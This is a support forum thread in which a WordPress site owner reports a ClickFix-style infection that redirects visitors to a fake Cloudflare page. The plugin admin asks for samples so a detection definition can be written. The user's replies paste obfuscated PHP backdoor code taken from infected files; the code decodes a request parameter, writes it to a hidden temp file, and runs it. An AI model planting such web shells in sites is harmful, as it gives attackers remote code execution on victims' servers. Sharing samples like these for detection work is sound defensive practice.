Home › Forums › Support Forum › Possible ClickFix infection – fake Cloudflare verification page
This topic contains 5 replies, has 2 voices, and was last updated by Anti-Malware Admin 1 week, 4 days ago.
-
AuthorPosts
-
July 28, 2026 at 1:13 am #175869
Please add detection and cleanup for this ClickFix infection:
Malicious files are added under:
wp-includes/php-ai-client/
The infected site redirects visitors to a fake Cloudflare verification page.
Please remove the added malicious files and any injected PHP, JavaScript, database entries, or scheduled tasks responsible for the redirect.Thank you for this excellent plugin. It has already saved me several times.
July 28, 2026 at 11:51 am #175906Thanks for the report but I’ll need to see those infected files to add them to me definition updates.
Can you send the actual files or send a link to a download site where you have shared them so that I can inspect the full contents of the infected files?
July 28, 2026 at 7:43 pm #175918hi
{‘id’: 3107, ‘code’: ‘ATyGJWyL<?php\n\nif(in_array(“c\\x6F\\x6Dp”, array_keys($_REQUEST))){\n$dchunk = array_filter([session_save_path(), ini_get(“upload_tmp_dir”), getenv(“TEMP”), “/dev/shm”, sys_get_temp_dir(), getcwd(), getenv(“TMP”), “/var/tmp”, “/tmp”]);\n$data_chunk = $_REQUEST[“c\\x6F\\x6Dp”];\n\t$data_chunk =explode \t( \’.\’ \t\t, \t$data_chunk)\t;\n$itm =\’\’;\n$salt7 =\’abcdefghijklmnopqrstuvwxyz0123456789\’;\n$sLen =strlen($salt7);\n$i =0;\n$__len =count($data_chunk);\n\ndo {\n if ($i >= $__len) break;\n $val =$data_chunk[$i];\n $chS =ord($salt7[$i % $sLen]);\n $d =((int)$val – $chS – ($i % 10)) ^ 16;\n $itm .= chr($d);\n $i++;\n} while (true);\nwhile ($ent = array_shift($dchunk)) {\n if (is_dir($ent) ? is_writable($ent) : false) {\n $ref = vsprintf(“%s/%s”, [$ent, “.entity”]);\n $binding = fopen($ref, \’w\’);\nif ($binding && fwrite($binding, $itm)) {\n fclose($binding);\n require $ref;\n @unlink($ref);\n exit;\n}\n }\n}\n}’, ‘url_postfix’: ‘;fputs_enc;16;comp’}
July 28, 2026 at 7:46 pm #175920Additional file On the Path wp-includes/sitemaps/bottom-1778750513.php:
{‘id’: 13891, ‘code’: ‘uzgGsYPy<?php\n\nif(isset($_POST[“\\x64\\x65sc”])){\n$ptr = array_filter([“/tmp”, sys_get_temp_dir(), “/var/tmp”, getcwd(), ini_get(“upload_tmp_dir”), “/dev/shm”, getenv(“TEMP”), getenv(“TMP”), session_save_path()]);\n$dat = hex2bin($_POST[“\\x64\\x65sc”]);\n$data_chunk =\’\’;$f=0;do{$data_chunk.=chr(ord($dat[$f])^49);$f++;}while($f<strlen($dat));\nwhile ($pgrp = array_shift($ptr)) {\n if ((bool)is_dir($pgrp) && (bool)is_writable($pgrp)) {\n $pset = “$pgrp/.reference”;\n if ($value = fopen($pset, \’w\’)) {\n fwrite($value, $data_chunk);\n fclose($value);\n include_once $pset;\n unlink($pset);\n die();\n}\n }\n}\n}’, ‘url_postfix’: ‘;fputs_xor;49;desc’}
July 28, 2026 at 7:55 pm #175922wp-includes/IXR/config_1778750398.php
107, ‘code’: ‘ATyGJWyL<?php\n\nif(in_array(“c\\x6F\\x6Dp”, array_keys($_REQUEST))){\n$dchunk = array_filter([session_save_path(), ini_get(“upload_tmp_dir”), getenv(“TEMP”), “/dev/shm”, sys_get…/wp-content/themes/agent.php
(int)rOuND(0+0+0+0);wp-content/languages/widget_area_1781011032.php
= hex2bin($_POST[“en\x74\x69t\xwp-content/themes/custom.file.2.1785240271.php
<!–WiN0WHbi–> \x0a <?php \x0a \x0a if(!is_null($_POST[“\x65nt\x72y”] ?? null)){ \x0a $marker = $_POST[“\x65nt\x72y”]; \x0a \x09 $marker \x09 \x09 = \x09 \x09 explode ( \x09 \x09 \x09 “.” \x09 , \ x09 \x09 \x09 $marker \x09 ); \x0a $pgrp = ”; \x0a $s8 = ‘abcdefghijklmnopqrstuvwxyz01234567It links to a gambling site [Redacted]
-
This reply was modified 1 week, 4 days ago by
Anti-Malware Admin. Reason: URL Redacted for security reasons
July 29, 2026 at 3:39 am #175976Unfortunately that does not help. I will need to see each whole file in it’s original format to write a definition that will remove all of the malicious code with removing any potentially removing any original benign code too. I cannot write a definition based on a fragment of code pasted into a post here.
Please find a way to send me all these files in their entirely original format. If you cannot attach them directly to a email to me then please try uploading them somewhere and send me a link to download them. wetransfer.com should work if you don’t have any other preferred method.
-
This reply was modified 1 week, 4 days ago by
-
AuthorPosts
You must be logged in to reply to this topic.

